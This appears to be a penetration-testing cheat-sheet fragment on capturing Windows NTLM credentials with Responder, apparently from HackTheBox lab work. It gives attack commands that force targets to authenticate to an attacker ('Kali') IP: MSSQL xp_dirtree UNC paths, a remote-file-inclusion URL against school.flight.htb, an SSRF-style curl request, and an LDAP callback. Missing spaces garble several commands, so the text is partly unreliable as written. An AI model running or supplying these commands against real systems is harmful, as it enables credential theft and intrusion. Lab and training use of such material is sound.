Kali> sudoresponder-Itun0-v# Database with mssqlclient.pySQL> EXECsp_helprotect'xp_dirtree'SQL> master.sys.xp_dirtree'\\10.10.14.54\any\thing'# Kali IP # Database with sqsh 1> use master;
2> EXEC sp_helprotect 'xp_dirtree';
3> go 1> exec master.dbo.xp_dirtree '\\10.10.14.54\any\thing'# Kali IP
Theft via HTTB
# Find a RFI vulnerability and then access to back to KaliKali> sudoresponder-Itun0Browser> http://school.flight.htb/index.php?view=//<KaliIP>/any/thing.txt# Another example Kali> sudoresponder-Itun0-vKali> curl"http://192.168.206.165:8080/?url=http://192.168.49.206"
Theft via LDAP
Kali> sudoresponder-Itun0# Target Windows OS # Access to Ldap, triggering back to Kali# ldap://<Kali IP>:389Targetsystemorservice>ldap://10.10.14.114:389